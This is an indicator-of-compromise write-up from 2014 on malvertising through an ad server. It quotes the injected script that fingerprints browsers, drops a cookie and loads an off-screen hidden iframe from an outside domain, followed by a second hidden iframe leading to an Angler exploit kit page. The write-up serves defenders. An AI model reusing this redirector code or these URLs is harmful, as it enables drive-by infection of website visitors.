IOC - ads.financialcontent.com - 2014-12-16

1. // IOC - ads.financialcontent.com - 2014-12-16
2.  
3. // Requests for Ads come to 'ads.financialcontent.com/www/delivery/ag.php'. This script generates another page that contains a JS with the following function:
4.  
5. function phpAds_adSenseLog(a) {
6.     var b = '__';
7.     var c;
8.     if (c = a.src.match(/^(.*)\/afr\.php\?n=([a-z0-9]+)/i)) {
9.         phpAds_adSenseClick(c[1], 'oaparams=' + b.length + b + 'n=' + c[2])
10.     } else {
11.         while (typeof a.parentNode != 'undefined') {
12.             if (a = a.parentNode) {
13.                 var t = a.innerHTML;
14.                 if (c = t.match(/\/\* openads=([^ ]*) bannerid=([^ ]*) zoneid=([^ ]*) source=([^ ]*) (.*)\*\//)) {
15.                     var d = 'oaparams=' + b.length + b + 'bannerid=' + c[2] + b + 'zoneid=' + c[3] + b + 'source=' + c[4];
16.                     var e = c[5].split(' ');
17.                     for (i = 0; i < e.length; i++) {
18.                         data = e[i].split('=');
19.                         if (data[0] != '' && typeof(data[1]) != 'undefined') {
20.                             d += b + data[0] + '=' + data[1]
21.                         }
22.                     }
23.                     phpAds_adSenseClick(c[1], d);
24.                     break
25.                 }
26.             }
27.         }
28.     }
29. }
30.  
31. // Once executed it'll generate an Ad request URL similar to this - http://ads.financialcontent.com/www/delivery/afr.php?n=fcad328486&&zoneid=4925&cb=fcad328486
32.  
33. // The page returned will have a 'bonus' JS added right after <body> tag. Example:
34.  
35. function p() {
36.     return (typeof ActiveXObject != "undefined" || typeof XMLHttpRequest != "undefained") && !/(Chrome|Firefox|Linux|Mac OS)/.test(navigator.userAgent)
37. }
38.  
39. function b() {
40.     return a.cookie.indexOf(d)
41. }
42. var a = document;
43. var l = "http: //concentrations.myownincomeathome.com/coach/component/view/quotes.js";
44. if (p()) {
45.     if (b() == -1) {
46.         var c = a.createElement("iframe");
47.         c.setAttribute("src", l);
48.         c.style.position = "absolute";
49.         c.style.left = "-1478px";
50.         c.style.top = "-1343px";
51.         c.style.width = "273px";
52.         c.style.height = "285px";
53.         try {
54.             a.body.appendChild(c);
55.             a.cookie = d + "=governing; expires=Thu, 18 Dec 14 17:27:50 +0300; path=/"
56.         } catch (w) {}
57.     }
58. } else {}
59. var d = "retains"
60.  
61. // The script will check the browser type and underlying OS and if it's not 'Chrome' or 'Firefox' or it's not running on 'Linux' or 'Mac OS' it will request yet another JS that contains the following code:
62.  
63. <iframe src="http://vomito-grondspekulasie.nh-cahps.net/ba8xtu44hs.php" style="position:absolute;left:-1880px;top:-1316px;width:206px;height:267px;"></iframe>
64.  
65. // When parsed will take the browser to Angler EK landing page.
66.  
67. // List of referring websites seen requesting Ads with 'bonus' content:
68. // http://kutv.com/
69. // http://www.microcapdaily.com/whats-next-for-nuvilex-inc-otcmktsnvlx/17687/
70. // http://www.tradersmagazine.com/profile/password.reminder.html
71. // http://www.talkmarkets.com/content/us-markets/guess-what-happened-the-last-time-the-price-of-oil-crashed-like-this?post=53841&utm_source=outbrain&utm_medium=referral
72. // http://www.wdrb.com/
73. // http://www.concordmonitor.com/news/work/business/12853256-95/concord-market-basket-employees-encourage-customer-boycott
74. // http://newsok.com/business
75. // http://www.buffalonews.com/business/homes-in-canadian-border-cities-are-far-more-costly-than-in-the-us-why-20141207